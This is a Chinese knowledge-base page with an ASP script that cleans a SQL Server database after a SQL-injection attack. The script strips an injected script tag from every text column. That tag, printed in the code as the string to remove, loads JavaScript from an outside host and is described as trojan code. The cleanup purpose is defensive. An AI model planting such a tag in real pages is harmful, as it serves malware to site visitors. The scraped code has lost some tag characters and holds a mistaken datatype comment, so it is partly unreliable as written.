主頁 > 知識庫 > 恢復(fù) SQL 被注入后的數(shù)據(jù)代碼

恢復(fù) SQL 被注入后的數(shù)據(jù)代碼

熱門標簽:漯河電銷回撥外呼系統(tǒng) 城市地圖標志怎么標注 硅基電話機器人官網(wǎng) 合肥crm外呼系統(tǒng)加盟 長沙外呼系統(tǒng)平臺 電話機器人怎么看余額 怎么修改高德地圖標注 西安電話自動外呼系統(tǒng) 美國地圖標注軟件下載
%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
!--#include file="Inc/conn.asp"-->
meta http-equiv="Content-Type" content="text/html; charset=gb2312">
%
server.ScriptTimeout = 1000000
'xtype=99 ntext 與text類型相似,不同的是,ntext類型采用unicode標準字符集。
'xtype=35 text 用于存儲大量文本數(shù)據(jù)。
'xtype=231 nvarchar 用來定義可變長度的二進制數(shù)據(jù),最大長度為4000個字符。
'xtype=167 varchar 存儲最??梢赃_到8000個字符的變長的字符數(shù)據(jù)
str = "'script src="http://e6t.3322.org/c.js" src="http://e6t.3322.org/c.js">/script>'" '加在文本類型字段后的木馬代碼
sql = "SELECT a.name as t_name,b.name as c_name, b.xtype FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)"
set rs = conn.execute(sql)
while Not rs.eof
t_name = rs("t_name") '表名
c_name = rs("c_name") '字段名
xtype = rs("xtype") '字段類型
If (xtype = 99 Or xtype = 35) then
conn.execute("update [" + t_name + "] set [" + c_name + "]=replace(cast([" + c_name + "] as varchar(8000)), " + str + ", '')")
Else
conn.execute("update [" + t_name + "] set [" + c_name + "]=replace([" + c_name + "], " + str + ", '')")
End If
rs.movenext
wend
response.Write("已經(jīng)初步清理了掛馬數(shù)據(jù),請重新刷新頁面試試看!")
%>

標簽:玉溪 廣西 商洛 瀘州 文山 撫順 濟源 吉林

巨人網(wǎng)絡(luò)通訊聲明:本文標題《恢復(fù) SQL 被注入后的數(shù)據(jù)代碼》,本文關(guān)鍵詞  恢復(fù),SQL,被,注入,后的,數(shù)據(jù),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《恢復(fù) SQL 被注入后的數(shù)據(jù)代碼》相關(guān)的同類信息!
  • 本頁收集關(guān)于恢復(fù) SQL 被注入后的數(shù)據(jù)代碼的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章